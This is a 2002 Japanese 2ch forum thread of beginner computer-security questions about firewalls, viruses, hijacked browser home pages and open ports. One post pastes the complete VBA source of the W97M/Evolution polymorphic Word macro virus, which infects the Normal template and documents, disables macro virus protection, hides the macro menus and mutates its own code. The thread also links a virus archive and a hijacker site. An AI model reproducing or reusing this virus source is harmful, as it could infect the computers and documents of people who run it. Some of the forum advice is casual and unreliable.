1 :
◆tHfDbgsU :
02/02/19 20:00
2 :
名無しさん@お腹いっぱい。 :02/02/19 20:00
3 :
名無しさん@お腹いっぱい。 :02/02/19 20:01
4 :
名無しさん@お腹いっぱい。 :02/02/19 20:01
いいハッキングツールの場所教えてください!
www.emacs.org くれてやる
8 :
http://www.ha.shotoku.ac.jp/cgi/h.nomura/1bbbs.cgi :02/02/19 22:19
9 :
名無しさん@お腹いっぱい。 :02/02/20 07:16
10 :
名無しさん@お腹いっぱい。 :02/02/20 07:49
今度マンションの専用線のLAN接続になるんですが、そしたらファイアウォール ソフトは必要ないですかね?
マンションとかだと、他のユーザー(他の部屋の人)がメールとか覗き見ることができるって聞いた。
12 :
名無しさん@お腹いっぱい。 :02/02/20 11:14
>>10 ひょっとしてキンデンのKJPSネットだったりする?
いちおう、ファイアウォールは設けられてるはずだけど、会社に
よって違うかもしれないので、聞いてみたら?
まあ個人レベルでもZONEのフリー版とか入れとけばいいんでないの?
>>11 最近はさすがに対策が施されている。
それが簡単にできちゃったら大問題でしょ。
13 :
名無しさん@お腹いっぱい。 :02/02/20 11:21
ちなみに自分がやってる対策は --------------------------------- ネットにつなぐときはゾーンアラーム(無料版)も立ち上げる。 マカフィーはアンインストールして、ウィルスバスターを買ってインストール。 www.antivirus.com/download/pattern.asp に時々行ってダウンロード 時々(だいたい週に一回くらい)パソコンの中をウィルスチェックする。 メールソフトはベッキーを使う。 メールに添付されてきた[***.exe]は即削除、もしくはウィルスチェックして削除。 IEは5.01sp2にする。 なるべくジャバスクリプトやアクチブXを切っておく。 ----------------------------------------- これくらいしかしていません。
15 :
名無しさん@お腹いっぱい。 :02/02/20 12:01
>>13 ,14
あー、答え言えるけれどあえて黙っとく(笑)
14の対策だけど、これで完全とは言い切れないと俺は思うね。
(というかかなり的外れ…失礼)
ヤフオクについては調べてないからはっきりしたことは
書けないけど。
最高の対策は、ヤフオク側が安全という意思表示をしない限り
使わないことじゃない?
>>15 いや、まぁそれはそうなんだけど。
でもそれは
「最高の避妊法はセックスをしないことじゃない?」と
言ってるのと同じなわけで。(´Д`)
13のリンク先を再度見たけど、単に身内の犯行かもしれない
みたいな書き方がされてたね。だとしたら俺の勘違いかな。失礼。
>>16 極論だけど、望まない結果を避ける為には最良かもね(藁
あとは外部に漏れてこまる情報は入力しないで使うとか。
18 :
どなたか教えてください :02/02/20 17:23
"*********" <_****380@ 2月19日 41KB Re: 上記メールがwebメールに届きましたが開くと、開けず、一瞬何かを送信したよな 気がしてます。コレの正体って誰かわかりませんか ? DLLすると、拡張子は aspなんです。変なメールじゃないと信じたいのですが、教えてください。
キッスしなければ妊娠しないよ。童貞君たちは何もわかっちゃいないな。
20 :
名無しさん@お腹いっぱい。 :02/02/20 17:42
19はどこへ向けてそのコメントを発射したのかな
21 :
名無しさん@お腹いっぱい。 :02/02/20 18:08
教えてください。 最近もの凄い勢いで私のPCにクローキングしている人がいるんです。 私のPCがレイプされそうです。 ウイルスバスター2001をインストールしているんですが、 パーソナルファイアーウォールを高に設定していれば、 私のPCの貞操は守れるのでしょうか? ちなみに、送信元IPは210.224.230.38で送信先IPは218.46.142.229です。 どなたか教えてください。
22 :
名無しさん@お腹いっぱい。 :02/02/20 18:10
33kにファイルをズタズタにってスレはどこいった?教えてくん。
23 :
名無しさん@お腹いっぱい。 :02/02/20 18:13
ノートンって幾らや?
25 :
名無しさん@お腹いっぱい。 :02/02/20 19:25
27 :
名無しさん@お腹いっぱい。 :02/02/20 21:12
24さん親切にありがとうございました。。。
トロイって再セットアップしても消えないんですか?
>>28 CMOSにゴミ書き込まなければ、クリーンインストールで全て解決。
30 :
厨房でスマソです。 :02/02/20 23:58
もうどうにもならないので書き込みました。 ネットにつなぐ度に、トップページが変なページに なります。インターネットオプションで何度ももとに 戻すのですが、一旦電源を切り、再び立ち上げるとまた そのページが自動的に出てきます。 あやしいものは削除ずみです。どうしてなのでしょう? また、対処方法をお知りの方、お教えください。
>>29さん もう少し詳しくお願いします。。。
32 :
名無しさん@お腹いっぱい。 :02/02/21 10:17
33 :
名無しさん@お腹いっぱい。 :02/02/21 16:11
直リンで飛ばないみたいだから、上記のページの 「IE のスタートページや検索、OE の署名などが勝手に変更されます」 をクリック。
35 :
名無しさん@お腹いっぱい。 :02/02/21 16:33
日付: 2002/02/21 、 時刻: 12:37:52 、 NEC-PCuser スクリプト遮断が疑わしい活動を検出しました。 ファイル: HELPCTR.EXE オブジェクト: FileSystem Object 活動: GetSpecialFolder このスクリプトは停止しました。 というメッセージがノートンの活動ログで出ました。 スクリプト停止したので今のところは問題ないようにみえますが・・ OSはMeです。PCはNECのMA80Tです。 一応googleで素人なりに検索して調べたところ NECのHELPCTR.EXEがIE6と相性が悪いからとか、と言う情報もありましたが やはり、ウィルス被害でしょうか? お答え、お待ちしております。
36 :
名無しさん@お腹いっぱい。 :02/02/21 16:47
37 :
名無しさんに接続中・・・ :02/02/21 16:49
ある人からftpのアドレス教えてもらったんだけど それに接続するとどんな情報が相手に伝わっちゃうの?
40 :
名無しさん@お腹いっぱい。 :02/02/21 17:51
>>38 ウィルスチェックをした上でIEの修復を行う。
マイコンピューター → アプリケーションの追加と削除 をダブルクリック。
「Microsoft Internet Explorer** and Internet tools」を選択。
[追加と削除] ボタンをクリック。
Internet Explorer を修復する にチェックを付けて [OK]ボタンをクリック。
指示に従って最後に再起動。
>>40 それでも直りません・・・
有賀とございました
あきらめます。
42 :
名無しさん@お腹いっぱい。 :02/02/21 18:06
IPで相手の特定できますか?
>>37 IP、アクセスした時刻、アクセスしたファイル、etc。
FTPサーバーに限らず、人を自分の家に入れるときは相手の素性をチェックしたいいのは当然でしょ。
44 :
質問!!!!!! :02/02/21 20:47
2〜3分に一回、キャーという音と同時に、一瞬貞子みたいな子が 画面に現れるようになっちゃたんですけど、どうすれば直りますか? 教えてください。
SSL(VER3.0)について詳しく解説しているサイトってどこかありませんか?
48 :
名無しさん@お腹いっぱい。 :02/02/21 22:50
見知らぬ方から、以下のようなメールがきました。 題名:The EyeFidelity filter plug-in software. 本文:Under the copyright laws, neither information nor the software may be copied, in whole or part, without the written consent of DVP Technologies Ltd., except in the normal use of the software or to make a backup copy of the software. This exception does not allow copies to be made for others. そして、information.exeというファイルが添付されています。(サイズは79k) これって、ウイルスでしょうか?
49 :
名無しさん@お腹いっぱい。 :02/02/21 22:53
50 :
名無しさん@お腹いっぱい。 :02/02/21 22:54
>>48 私だったら、見知らぬ人から来たメールなら、迷わずポイするけどなぁ。
>>48 本当に見知らぬ差出人だったら、普通捨てる。
とりあえずウィルスチェックかけてみたの?
Kerioを試してみたくなったのですが、ZoneAlarmとの共存って可能でしょうか?ZoneAlarm消すのが面倒なんでそのままKerio入れちゃいたいんですが。不具合とかあるんでしょうか?よろしくお願いします。
>>53 あんまり気にする必要のないトラップみたいですね。
安心しました。ありがとうございました。
共存、できませんでした。
長文すみません、マジレス希望します。
---
http://easyweb.easynet.co.uk/~hiros/virii99/Not/dodgy.zip 寝ぼけてこのファイルを解凍して
出てきたファイルを実行してしまったのですが、
実際PCにどんな影響が出てしまうのでしょうか?
(viriiとか書いてあるので多分ウイルスでしょう・・・(; ´Д`))
なんだかやばそうなので急いで消しましたが
どうにも心配です・・・
とりあえず再起動してOSが吹っ飛ぶとかはいやなので
今のうち必要なファイルはバックアップを取っておこうと考えてます。
ウイルス踏んだのは恐らく初めてなのでかなり心配してます。
よろしくお願いします。
これだけじゃ感染しねえべ。
TNN.NFO って? MSInfoドキュメントってなんじゃらほい?
60 :
名無しさん@お腹いっぱい。 :02/02/22 12:14
Outlook ExpressにTCYっていう」変なメール(ウィルスかな)を 受信して以来、メールができません。Outlook Expressの画面を開くと マウスのクリックができなくなります。解決法を教えて下さい。
61 :
名無しさん@お腹いっぱい。 :02/02/22 13:00
昨日マイコンピューターの中のDドライブ(CD-ROM) Eドライブ(CD-RW)が無くなってしかもsafeモードになっちゃったよ。 これって、ウイルスですか?家庭内LANも全滅っぽい(泣) しかも、WINDOWSのCDを読み込んでくれないのでフォーマットもできないよ 誰かこの状態でのフォーマット方法教えて〜〜〜〜〜〜!!!!
>>61 safeモードだからDやEがなくなったり、LANが使用できないんだと思われ。
IDEケーブル抜けてない?起動時にF8押してノーマルで起動できんか確認。
>>60 ほかのメーラーでも起きるか確認。
63 :
名無しさん@お腹いっぱい。 :02/02/22 13:13
65 :
名無しさん@お腹いっぱい。 :02/02/22 13:39
>>62 ありがとうございます。今、起動したらなぜか直ってた。???
再現性があるかどうか、様子みてみます。多謝
直リンクしようとするとpinktowerってとこに 直リンしようとしたアドレスが出て一々そこをクリックしていってるんですが これがブラクラなんでしょうか?またこれを無くす方法知ってる方教えてください
もう一度まとめて質問し直してくれ。高卒なもんで意味がよくわからん。
>>66
69 :
名無しさん@お腹いっぱい。 :02/02/22 19:22
>>67 そこはエロ動画に自動リンクしてるサイトだ。
>>66 半角板行って聞いた方がいいよ。部落らと違うと思うけど。
>>66 リンクが直じゃなくて
http://ime.nu/ 経由するってことだろ。
ブラクラじゃない(w し、2chの仕様なんで変えられん。
「おめーら!外部へのリンクだぞ!ホントに踏むのか?!飛んでイイノカ?」
と…冷静になることを促しているのだ。
>>70 君、適当なこというと叩かれるよ。
初級ネットに逝った方がいいよ。
>>71 >>66 の日本語が変なだけで、言いたいことは
pinktowerへの直リンを貼ったつもりが、リンク先は
直リンしようとした(pinktowerの)アドレスが出て
それをいちいちクリックしないと行けない、
この症状ブラクラですか?…と訊いてるわけでしょ?
なんで叩かれるの?
74 :
名無しさん@お腹いっぱい。 :02/02/22 20:34
おーい!!
>>69 に半角版に誘導され、そのまま質問のことは忘れて動画漁りに精を出しているのでは。
71ではないが、
>>66 のもとの質問は、
http://pc.2ch.net/test/read.cgi/sec/1014356873/1 どの直リンクリックしても変なアダルトページに
飛ばされるんだけど・・・
どゆことでしょう?pinktowerってとこなんですが・
だったので、逆にAという直リンを踏むとpinktowerにAという
アドレスが出てクリックしないといけない、この症状ブラクラですか?
っていう意味だと思ったんだけど。どこで貼ってあった直リンかどこへの
直リンかわからないので答えようがないと思うんだけどなあ。
>>66 ってそのスレの1と同一人物?
こっちでは質問の内容が違うような気がするが…。
半角板で聞いてみます。ご迷惑おかけしました。
どっちにしても「くだらねぇ質問」だな…は〜ぁ、メシにすっか。
82 :
名無しさん@お腹いっぱい。 :02/02/22 22:16
>>66 2chからの直リンをわからないようにするためにpinktowerを一回クッションに
しているだけで危険はない。
今は、ime.nu に統一されている感あり。
83 :
名無しさん@お腹いっぱい。 :02/02/23 00:04
KANって何処に行ったのですか?
ルータ使うとプライベートIPに変換されるっていうのはアタックされることが ないからファイヤーウォールとか使わなくても大丈夫なの?
Attribute VB_Name = "EVOLA" Public Source As String Public ByeMacro As String Public Hostinf As Boolean Public FileInf As Boolean Public FExport As String Public PMExport As String Public PMFile_Yes As Boolean Public Ex_Yes As Boolean Public Filename As String Public FileID As String Public FileID2 As String Public Virname As String Public FC_There As Boolean Public FO_There As Boolean Public FP_There As Boolean Public FN_There As Boolean Public FS_There As Boolean Public FSA_There As Boolean Public VrusName As String Public Armor As Boolean Function Self_Recognition() On Error Resume Next Application.EnableCancelKey = wdCancelDisabled Open "C:\windows\system\vnames.cpl" For Input As #1 Do Line Input #1, Virname For Z = 1 To ActiveDocument.VBProject.VBComponents.Count If ActiveDocument.VBProject.VBComponents(Z).Name <> "ThisDocument" Then If Virname = ActiveDocument.VBProject.VBComponents(Z).Name Then GoTo lost If Virname <> ActiveDocument.VBProject.VBComponents(Z).Name Then GoTo newname newname: Close #1 Open "C:\windows\system\vnames.cpl" For Append As #1 Print #1, ActiveDocument.VBProject.VBComponents(Z).Name Close #1 End If If ActiveDocument.VBProject.VBComponents(Z).Name = "ThisDocument" Then GoTo lost lost: Next Z Loop Until EOF(1) Close #1 Dim Lib Open "C:\windows\system\vnames.cpl" For Input As #1 Do Line Input #1, Virname For Lib = 1 To
NormalTemplate.VBProject.VBComponents.Count If NormalTemplate.VBProject.VBComponents(Lib).Name = "ThisDocument" Then GoTo skip If NormalTemplate.VBProject.VBComponents(Lib).Name = Virname Then Hostinf = True: GoTo doccheck skip: Next Lib Loop Until EOF(1) doccheck: Close #1 Open "C:\windows\system\vnames.cpl" For Input As #1 Do Line Input #1, Virname For Lib = 1 To ActiveDocument.VBProject.VBComponents.Count If ActiveDocument.VBProject.VBComponents(Lib).Name = "ThisDocument" Then GoTo nope If ActiveDocument.VBProject.VBComponents(Lib).Name = Virname Then FileInf = True: GoTo leave If ActiveDocument.VBProject.VBComponents(Lib).Name <> Virname Then FileInf = False: nope: Next Lib Loop Until EOF(1) FileInf = False leave: Close #1 End Function Function Armor_Status() Application.EnableCancelKey = wdCancelDisabled If GetAttr(NormalTemplate.FullName) = vbReadOnly Then Armor = True Offense: If Armor = True Then SetAttr (NormalTemplate.FullName), vbNormal Armor = False End Function Function Export_Code() On Error Resume Next Application.EnableCancelKey = wdCancelDisabled FExport = Dir("C:\windows\system\export.sys") If FExport = "Export.sys" Then Ex_Yes = True If Ex_Yes = False Then GoTo Morph Else GoTo Recognize Morph: Randomize Timer q = Int(Rnd(1) * 5) + 1 For vi = 1 To q x = Int(Rnd(1) * 26) If x = 1 Then a$ = "A" If x = 2
Then a$ = "B" If x = 3 Then a$ = "C" If x = 4 Then a$ = "D" If x = 5 Then a$ = "E" If x = 6 Then a$ = "F" If x = 7 Then a$ = "G" If x = 8 Then a$ = "H" If x = 9 Then a$ = "I" If x = 10 Then a$ = "J" If x = 11 Then a$ = "K" If x = 12 Then a$ = "L" If x = 13 Then a$ = "M" If x = 14 Then a$ = "N" If x = 15 Then a$ = "O" If x = 16 Then a$ = "P" If x = 17 Then a$ = "Q" If x = 18 Then a$ = "R" If x = 19 Then a$ = "S" If x = 20 Then a$ = "T" If x = 21 Then a$ = "U" If x = 22 Then a$ = "V" If x = 23 Then a$ = "W" If x = 24 Then a$ = "X" If x = 25 Then a$ = "Y" If x = 26 Then a$ = "Z" Filename = Filename + a$ Next vi x = Int(Rnd(1) * 999) + 1 FileID = "C:\windows\system\" & Filename & x & ".cpl" ' RAPE v1.1 Export File ID Morph Open "C:\windows\system\Export.sys" For Append As #1 Print #1, FileID Close #1 For x = 1 To ActiveDocument.VBProject.VBComponents.Count If ActiveDocument.VBProject.VBComponents(x).Name = "ThisDocument" Then GoTo nex If ActiveDocument.VBProject.VBComponents(x).Name <> "ThisDocument" Then GoTo rite rite: Open "C:\windows\system\vnames.cpl" For Append As #1 Print #1,
ActiveDocument.VBProject.VBComponents(x).Name Close #1 nex: Next x CheckMe = Dir("C:\windows\system\PMF1199.cpl") If CheckMe = "PMF1199.cpl" Then GoTo nextt Do On Error Resume Next Open "C:\windows\system\vnames.cpl" For Input As #1 Line Input #1, Virname NormalTemplate.VBProject.VBComponents(Virname).export FileID ActiveDocument.VBProject.VBComponents(Virname).export FileID Loop Until EOF(1) nextt: Exit Function Recognize: Open "C:\windows\system\Export.sys" For Input As #1 Line Input #1, FileID Close #1 CheckMe = Dir("C:\windows\system\PMF1199.cpl") If CheckMe = "PMF1199.cpl" Then GoTo tryharder Do On Error Resume Next Open "C:\windows\system\vnames.cpl" For Input As #1 Line Input #1, Virname NormalTemplate.VBProject.VBComponents(Virname).export FileID ActiveDocument.VBProject.VBComponents(Virname).export FileID Loop Until EOF(1) tryharder: End Function Function Polymorphic_Check() On Error Resume Next Application.EnableCancelKey = wdCancelDisabled Open FileID2 For Input As #1 Dim FC_Check Do Line Input #1, FC_Check If FC_Check = "Sub FileClose()" Then FC_There = True: GoTo FO_Look Loop Until EOF(1) FO_Look: Dim FO_Check Do Line Input #1, FO_Check If FO_Check = "Sub FileOpen()" Then FO_There = True: GoTo FP_Look Loop Until EOF(1) FP_Look: Dim FP_Check Do Line Input #1, FP_Check If FP_Check = "Sub FilePrint()" Then FP_There = True: GoTo FN_Look Loop
Until EOF(1)FN_Look:Dim FN_Check Do Line Input #1, FN_Check If FN_Check = "Sub FileNew()" Then FN_There = True: GoTo FS_Look Loop Until EOF(1)FS_Look:Dim FS_CheckDo Line Input #1, FS_Check If FS_Check = "Sub FileSave()" Then FS_There = True: GoTo FSA_Look Loop Until EOF(1) FSA_Look:Dim FSA_CheckDo Line Input #1, FSA_Check If FSA_Check = "Sub FileSaveAs()" Then FSA_There = True: Exit Function Loop Until EOF(1) End Function Function Evolve() On Error Resume Next Application.EnableCancelKey = wdCancelDisabled 'RAPE v1.1 Macro Virus Command/Code Editor - adds 1 to 6 Commands (subs) Open "C:\windows\system\Export.sys" For Input As #1 Line Input #1, FileID2Close #1PM = Int(Rnd(1) * 150) + 1 If PM = 22 Then If FC_There = True Then Exit Function Open FileID2 For Append As #1 Print #1, "Sub FileClose()" Print #1, "On error resume next" Print #1, "Call Evolution" Print #1, "Wordbasic.FileSave" Print #1, "End Sub" Close #1 End If If PM = 73 Then If FO_There = True Then Exit Function Open FileID2 For Append As #1 Print #1, "Sub FileOpen()" Print #1, "on error resume next" Print #1, "Dialogs(wdDialogFileOpen)" Print #1, "Call Evolution" Print #1, "end sub" Close #1 End If If PM = 69 Then If FP_There = True Then Exit Function Open FileID2 For Append As #1 Print #1, "Sub FilePrint()" Print #1, "on error resume next" Print #1, "Dialogs(wdDialogFilePrint)" Print #1, "Call Evolution" Print #1, "End sub" Close #1 End If If PM = 122 Then If FN_There = True Then Exit Function Open FileID2 For Append As #1 Print #1, "Sub FileNew()" Print
#1, "on error resume next"Print #1, "Dialogs(wdDialogFileNew)" Print #1, "Call Evolution"Print #1, "End Sub" Close #1End IfIf PM = 90 Then If FS_There = True Then Exit Function Open FileID2 For Append As #1Print #1, "Sub FileSave()" Print #1, "on error resume next" Print #1, "call Evolution" Print #1, "wordbasic.filesave" Print #1, "end sub" Close #1 End If If PM = 8 Then If FSA_There = True Then Exit Function Open FileID2 For Append As #1 Print #1, "Sub FileSaveAs()" Print #1, "on error resume next" Print #1, "Dialogs(wdDialogFileSaveAs)" Print #1, "Call Evolution" Print #1, "wordbasic.filesave" Print #1, "end sub" Close #1 End If End Function Function Norminf() On Error Resume Next Application.EnableCancelKey = wdCancelDisabled Open "C:\windows\system\Export.sys" For Input As #1 Line Input #1, FileID2 Close #1 For l = 1 To ActiveDocument.VBProject.VBComponents.Count If ActiveDocument.VBProject.VBComponents(l).Name = "ThisDocument" Then GoTo nexus If ActiveDocument.VBProject.VBComponents(l).Name <> "ThisDocument" Then Open "C:\windows\system\vnames.cpl" For Append As #1 Print #1, ActiveDocument.VBProject.VBComponents(l).Name Close #1 End If nexus: Next l With NormalTemplate.VBProject.VBComponents.Import(FileID2) End With MsgBox "An error has occurred, please save all Documents and restart Microsoft Word. If the problem persists, please contact Microsoft Technical Support.", 48 End Function Function FileInft() On Error Resume Next Application.EnableCancelKey = wdCancelDisabled Open
"C:\windows\system\Export.sys" For Input As #1 Line Input #1, FileID2 Close #1 With ActiveDocument.VBProject.VBComponents.Import(FileID2) End With Randomize Timer WD = Int(Rnd(1) * 8) + 2 For evo = 2 To WD x = Int(Rnd(1) * 26)If x = 1 Then a$ = "A"If x = 2 Then a$ = "B" If x = 3 Then a$ = "C"If x = 4 Then a$ = "D"If x = 5 Then a$ = "E" If x = 6 Then a$ = "F" If x = 7 Then a$ = "G" If x = 8 Then a$ = "H" If x = 9 Then a$ = "I" If x = 10 Then a$ = "J" If x = 11 Then a$ = "K" If x = 12 Then a$ = "L"If x = 13 Then a$ = "M"If x = 14 Then a$ = "N" If x = 15 Then a$ = "O" If x = 16 Then a$ = "P" If x = 17 Then a$ = "Q" If x = 18 Then a$ = "R" If x = 19 Then a$ = "S" If x = 20 Then a$ = "T" If x = 21 Then a$ = "U" If x = 22 Then a$ = "V" If x = 23 Then a$ = "W" If x = 24 Then a$ = "X" If x = 25 Then a$ = "Y" If x = 26 Then a$ = "Z" VrusName = VrusName + a$ Next evo Open "C:\windows\system\vnames.cpl" For Input As #1 Do Line Input #1, Virname Application.OrganizerRename Source:=ActiveDocument.FullName, Name:=Virname, newname:=VrusName, Object:=wdOrganizerObjectProjectItems ' RAPE v1.1 Macro Virus Name Randomizer - 2 to 8 letters Loop Until EOF(1) Close #1 For x = 1 To ActiveDocument.VBProject.VBComponents.Count If ActiveDocument.VBProject.VBComponents(x).Name = "ThisDocument" Then GoTo nex If ActiveDocument.VBProject.VBComponents(x).Name <> "ThisDocument" Then GoTo rite rite: Open "C:\windows\system\vnames.cpl" For Append As #1 Print #1, ActiveDocument.VBProject.VBComponents(x).Name Close #1 nex: Next x End
Function Function Evolution() On Error Resume NextApplication.EnableCancelKey = wdCancelDisabled Call Self_RecognitionCall Armor_Status Call Export_CodeCall Polymorphic_Check Call Evolve If Hostinf = False Then Call Norminf If FileInf = False Then Call FileInft Options.VirusProtection = False Options.ConfirmConversions = FalseOptions.SaveNormalPrompt = False If Armor = False Then CommandBars("tools").Controls("Macro").Delete If Armor = False Then CommandBars("tools").Controls("Templates and add-ins...").Delete ' W97M/Evolution ' W97M/Evolution .a Variant by Nex and Error ' Polymorphic Stealth Word97 Macro Virus ' All Things Must Change... ' Polymorphic thanx to Random Arithmetic Polymorphic Engine (RAPE v1.1) by Error ' RAPE v1.1 does:' Randomly Morphs Source Code by Adding Random Remarks ' Randomly Selects Source Code Export File - Then Morphs it ' Randomly Creates Virus Macro Name' Randomly Adds 1 to 6 Commands to Code End Function Sub AutoClose() On Error Resume Next Application.EnableCancelKey = wdCancelDisabled Call Evolution WordBasic.filesave End Sub Sub AutoExec()On Error Resume NextApplication.EnableCancelKey = wdCancelDisabled Call Armor_StatusOptions.VirusProtection = False Options.ConfirmConversions = False Options.SaveNormalPrompt = False If Armor = False Then CommandBars("tools").Controls("Macro").Delete If Armor = False Then CommandBars("tools").Controls("Templates and add-ins...").Delete End Sub Sub AutoExit() On Error Resume Next Application.EnableCancelKey = wdCancelDisabled Call Evolution PMExport = Dir("C:\Windows\System\PMF1199.cpl") If PMExport = "PMF1199.cpl" Then PMFile_Yes = True If PMFile_Yes = True Then Exit Sub Open "C:\Windows\System\PMF1199.cpl" For Append As #1 Print #1, "W97M/Evolution .a by Nex" Print #1, "Random Arithmetic Polymorphic Engine (RAPE v1.1) by Error" Close #1 Open "C:\windows\system\Export.sys" For Input As #2 Line Input #2, FileID Close #2 Open FileID For Append As #9 Print #9, "' EOF" Close #9 Open FileID For Input As #3 Randomize Timer W = Int(Rnd(1) * 5) + 1 For vir
= 1 To W x = Int(Rnd(1) * 26) If x = 1 Then a$ = "A"If x = 2 Then a$ = "B" If x = 3 Then a$ = "C"If x = 4 Then a$ = "D" If x = 5 Then a$ = "E"If x = 6 Then a$ = "F" If x = 7 Then a$ = "G"If x = 8 Then a$ = "H" If x = 9 Then a$ = "I"If x = 10 Then a$ = "J" If x = 11 Then a$ = "K" If x = 12 Then a$ = "L"If x = 13 Then a$ = "M" If x = 14 Then a$ = "N"If x = 15 Then a$ = "O"If x = 16 Then a$ = "P" If x = 17 Then a$ = "Q"If x = 18 Then a$ = "R" If x = 19 Then a$ = "S"If x = 20 Then a$ = "T" If x = 21 Then a$ = "U" If x = 22 Then a$ = "V" If x = 23 Then a$ = "W" If x = 24 Then a$ = "X" If x = 25 Then a$ = "Y" If x = 26 Then a$ = "Z" Filename = Filename + a$Next vir F = Int(Rnd(1) * 999) + 1FileID2 = "C:\windows\system\" & Filename & F & ".cpl" Open FileID2 For Append As #4Do inpux:Line Input #3, stuffPrint #4, stuff Randomize Timer t = Int(Rnd(1) * 5) + 1 If t = 1 Then Z$ = " '" & Application.UserName If t = 2 Then Z$ = " '" & Application.UserInitials If t = 3 Then Z$ = " '" & Application.UserAddress if t >= 4 then goto inpux Print #4, Z$ ' Source Code Morpher - adds random remarks to Code (RAPE v1.1 by Error) Loop Until stuff = "' EOF" Close #3 Close #4Kill "C:\windows\system\export.sys" Open "C:\windows\system\Export.sys" For Append As #5 Print #5, FileID2Close #5 End SubSub AutoNew()On Error Resume NextApplication.EnableCancelKey = wdCancelDisabled Call Evolution End Sub Sub AutoOpen() On Error Resume Next Application.EnableCancelKey = wdCancelDisabled Call Evolution End Sub Sub FileTemplates() Application.EnableCancelKey = wdCancelDisabled End SubSub ToolsCustomize()Application.EnableCancelKey = wdCancelDisabled End SubSub ToolsMacro()Application.EnableCancelKey = wdCancelDisabled End SubSub ViewVBCode() Application.EnableCancelKey = wdCancelDisabledEnd Sub ' "The most polymorphic Macro Virus to date...." - NAI ' EOF
↑これなに?
95 :
名無しさん@お腹いっぱい。 :02/02/23 12:15
ADSLモデムでネットに繋いでるんですが、 この場合、ISPはこのモデムにIPを割り当ててるわけで、 この状態でポートスキャンしてTCP80が開いてる等と結果が出ても、 それはこのモデムのポートが開いてるということだと 理解していいんでしょうか? そしてこれはモデムには外部から進入されても、 PCはFWで守られてると言うことで、 安心してほっといてもいいんでしょうか? モデムの設定を色々いじってみてるんですが、 80が開いてるのは変わりません。 W98SE+TPF、ISPはACCAです。
>>96 脳豚では、何の反応もなかった・・・(;´Д`)
>>97 実行しないように注意してスキャン。
脳豚ではBloodhound.HybridCOMとなる。
99 :
名無しさん@お腹いっぱい。 :02/02/23 14:40
100 :
名無しさん@お腹いっぱい。 :02/02/24 00:41
どっちがプリップでどっちがフラップですか?
101 :
名無しさん@お腹いっぱい。 :02/02/24 00:46
某掲示板に書いてあった
ttp://go5.163.com/sg9741/ にアクセスしたらいきなり変な中国語のサイトにつながって、
その後ホームが勝手にそのサイトに変更されていた(これは戻しました)り、
PCの電源入れただけで勝手にエクスプローラーが開いてこのサイトに
接続しようとするんですが、どうやってこれを解除したらいいのでしょうか?
102 :
名無しさん@お腹いっぱい。 :02/02/24 00:50
ルーターのファイアーウォールで閉じるべきポートを教えてくれないでしょうか?
103 :
ひみつの検疫さん :2024/11/04(月) 01:13:13 ID:MarkedRes
汚染を除去しました。
これって結局なんなんですか?できれば解決法教えてください。
105 :
名無しさん@お腹いっぱい。 :02/02/24 02:32
137.138.139.445.
107 :
名無しさん@お腹いっぱい。 :02/02/24 03:10
使用しているTCPポート、UDPポートって どうやって確認するんですか?
ありがとうございます。じっくり検索してみます。
110 :
名無しさん@お腹いっぱい。 :02/02/24 05:49
111 :
名無しさん@お腹いっぱい。 :02/02/24 09:51
食らったのは可愛そうだけど、 それをリンクに貼らなくてもいいのでわ? h取るとか・・・
>>111 そだったな。
つか、リンク先開くだけじゃ害はないから。
113 :
助けてください :02/02/24 10:19
114 :
名無しさん@お腹いっぱい。 :02/02/24 10:44
NortonのLiveUpdateですが、現在2002をデスクトップとノートに インストールして使ってます。各々LiveUpdateして使ってますが、 それで支障がないか心配です。つまり、例えばUpdateFile「1」があったとして、 デスクトップにインストールすると、次回の更新チェックをノートですると 「1」はインストール済みとしてスキップされてしまうのでしょうか? ソフトウェアは1ユーザーにつきデスクトップとノートにインストールできる と思っていたんですが、それでいいのでしょうか?
>>114 Nortonは、1パッケージにつき1コンピュータのみにインストールするという
許諾のため、そのような使い方はライセンス違反です。
インストール時にそのようなライセンス表示があったはずです。
同じ更新を2回ずつ行っていると、Symantec にはそのことが筒抜けですよ。
至急、ノート用にもうひとつパッケージを購入されたほうがいいでしょう。
116 :
名無しさん@お腹いっぱい。 :02/02/24 11:10
ダイアルアップが出来なくなってしまいました 昨日まで問題なく、今日電源入れて接続しようとしたところ 「電話帳のエントリに接続できません エラー756:この接続はすでにダイヤルされています」 他にモデムはなく、接続しているわけではありません。 一旦、ダイヤルアップ接続アイコン削除し新規作成しましたが状況は同じです。 助けてください!!
>>116 それのどこがセキュリティなんだ?
Win板で聞いた方がいいな。
>>117 説明不足で申し訳ないです
実は、進入された疑いがあるんです。
昨日、終了する直前気が付いたのですが、
BIDが赤く点滅しており
「トロイの木馬プログラムから侵入者に対してデータが送信されています」
という具合になっていたのです。
直ちに回線切断しウイルスチェックしましたが何もありませんでした。
で、今日接続できなくなっていたわけです・・・
再インストールでしょうか?
>>118 MS-DOSからnetstat -an > test.logしてここにはっつけてみ。
>>110 これjpegに偽装した怪しい奴でしょ。
自己責任つーことで逝って良しですな。
アクセサリにコマンドプロンプトって無いか?
まず見るべきはnetstat -an, netstat -rn, ipconfig /allだな。
>>110 右クリックして「対象をファイルに保存」とすると、*.html になるので、
確かに html ですね。
こんなん出ました! インターネット接続共有のホストPCです C:\>netstat -an Active Connections Proto Local Address Foreign Address State TCP 0.0.0.0:135 0.0.0.0:0 LISTENING TCP 0.0.0.0:445 0.0.0.0:0 LISTENING TCP 0.0.0.0:1025 0.0.0.0:0 LISTENING TCP 0.0.0.0:1028 0.0.0.0:0 LISTENING TCP 127.0.0.1:1027 0.0.0.0:0 LISTENING TCP 127.0.0.1:3007 0.0.0.0:0 LISTENING TCP 192.168.0.1:3002 0.0.0.0:0 LISTENING TCP 192.168.0.1:3003 0.0.0.0:0 LISTENING TCP 192.168.0.1:3004 0.0.0.0:0 LISTENING TCP 192.168.0.1:11989 0.0.0.0:0 LISTENING UDP 0.0.0.0:135 *:* UDP 0.0.0.0:445 *:* UDP 0.0.0.0:1026 *:* UDP 0.0.0.0:1645 *:* UDP 0.0.0.0:1646 *:* UDP 0.0.0.0:1812 *:* UDP 0.0.0.0:1813 *:* UDP 0.0.0.0:3001 *:* UDP 127.0.0.1:3005 *:* UDP 127.0.0.1:3006 *:* UDP 192.168.0.1:53 *:* UDP 192.168.0.1:67 *:* UDP 192.168.0.1:68 *:* UDP 192.168.0.1:500 *:* UDP 192.168.0.1:12886 *:*
